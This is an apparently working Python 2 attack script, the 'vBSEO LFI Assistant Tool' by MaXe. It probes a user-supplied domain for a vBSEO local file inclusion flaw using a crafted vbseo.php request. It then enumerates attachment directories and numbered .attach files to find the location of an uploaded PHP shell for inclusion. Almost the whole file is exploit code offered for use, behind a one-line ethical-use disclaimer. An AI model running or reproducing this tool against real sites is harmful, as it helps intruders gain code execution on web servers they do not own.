#!/usr/bin/python

#  ______          __                  __  __     __   ______   
# /\__  _\        /\ \__              /\ \/\ \  /'__`\/\__  _\  
# \/_/\ \/     ___\ \ ,_\    __   _ __\ \ `\\ \/\ \/\ \/_/\ \/  
#    \ \ \   /' _ `\ \ \/  /'__`\/\`'__\ \ , ` \ \ \ \ \ \ \ \  
#     \_\ \__/\ \/\ \ \ \_/\  __/\ \ \/ \ \ \`\ \ \ \_\ \ \ \ \ 
#     /\_____\ \_\ \_\ \__\ \____\\ \_\  \ \_\ \_\ \____/  \ \_\
#     \/_____/\/_/\/_/\/__/\/____/ \/_/   \/_/\/_/\/___/    \/_/
#      --------------------------------------------------------
#		Title:	vBSEO LFI Assistant Tool
#	       Author:	MaXe
#		 Site: 	http://www.intern0t.net
#
#	  Description: 	1) Checks whether the vBSEO installation
#			is patched or not. 2) Attempts to find
#			the physical location of an uploaded
#			attachment phile. (PHP Shell)
#
#	      Version:	2.1.4 - Reversed Algorithm - Basic Version
#
#	      License:	-- Attribution-ShareAlike 3.0 Unported --
#			http://creativecommons.org/licenses/by-sa/3.0/
#
#		Notes:	The basic version does not contain multi-
#			threading nor is it able to search through
#			multiple sub directories which the advanced 
#			version will be able to.
#			Please note, that this tool does not work on
#			all types of hosts and you should therefore
#			modify this script to your own needs.
#
#	   Disclaimer:	This tool is meant for ethical purposes only.


# Import the appropriate libraries.
import os
import re
import httplib
import sys

# Clear the screen in a sufficient way.
if(os.name) == "posix":
    os.system("clear")
elif(os.name) == "nt":
    os.system("cls")
else:
    print "[!] Cannot clear screen automatically.\n"
   
print "File Finder by MaXe from InterN0T.net\n\n"

# Get user-input and define global variables.
target = raw_input("Enter a domain to scan: ")
file_match = raw_input("Enter a keyword to look for: ")
main_dir = ["attach","attachment","attachments","download"]
poss_main_dir = []
sub_dir = []

# Strip away http and https from the target variable.
striptarget = re.compile('(http://|https://)')
newtarget = striptarget.sub('', target)

# Perform a simple LFI to check whether the target is vulnerable or not.
conn = httplib.HTTPConnection(newtarget, 80)
print "[*] Checking if site appears to be vulnerable."
conn.request("GET", "/vbseo.php?vbseoembedd=1&vbseourl=./clientscript/ieprompt.html")
resp = conn.getresponse()

# If the response code is 200 OK, check if the file really was included.
if resp.status == 200:
	print "[+] Site is responding, this is good."
	if re.search("(<title>Enter text...</title>)", resp.read()):
		print ">> The site appears to be vulnerable!"
	else:
		print "[!] The site appears to be patched. (unknown error)"

elif resp.status == 404:
	print "[!] The site appears to be patched. (404)"

# Search for attachment directories
for value in main_dir[0:]:
	conn = httplib.HTTPConnection(newtarget, 80)
	print "[*] Trying: http://%s/%s/" % (newtarget,value)
	conn.request("HEAD", "/%s/" % value)
	resp = conn.getresponse()
	
	# If the response code is 403 (Forbidden), set a new variable and continue.
	if resp.status == 403:
		print "[+] Directory found: /%s/" % value
		
		if poss_main_dir == []:
			poss_main_dir = ["%s" % value]
		else:
			poss_main_dir += ["%s" % value]
		
	conn.close()

if poss_main_dir == []:
	print "[!] No directories were found, exiting."
	sys.exit()


# Search for possible sub directories
for value in poss_main_dir:

	i = 0
	print "[*] Trying subdirs within: http://%s/%s/" % (newtarget,value)
	while i <= 9:
		conn = httplib.HTTPConnection(newtarget, 80)
		conn.request("HEAD",  "/%s/%s/" % (value,i))
		resp = conn.getresponse()
		
		if resp.status == 403:
			print "[+] Sub Directory found: /%s/%s/" % (value,i)
			found = "%s/%s" % (value,i)
			
			if sub_dir == []:
				sub_dir = ["%s" % found]
			else:
				sub_dir += ["%s" % found]
				
		i=i+1
		conn.close()
		
if sub_dir == []:
	print "[!] No sub directories were found, exiting."
	sys.exit()

# Search all the sub directories found for our phile
for value in sub_dir[0:]:

	i = 99
	print "[*] Trying to find our file within: /%s/" % value
	while i >= 0:
		conn = httplib.HTTPConnection(newtarget, 80)
		conn.request("GET", "/%s/%s.attach" % (value,i))
		resp = conn.getresponse()
		
		if resp.status == 200:
			print "[+] File found, does it match our keyword? >> %s" % file_match
			
			if re.search("(%s)" % file_match, resp.read()):
				print ">> File contains our keyword!"
				print "Part URL: /%s/%s.attach" % (value,i)
				print "Full URL: http://" + newtarget + "/%s/%s.attach \n" % (value,i)
				sys.exit(0)
				
		i=i-1
		conn.close()
		
# Don't forget, that this script can be used for more than one thing.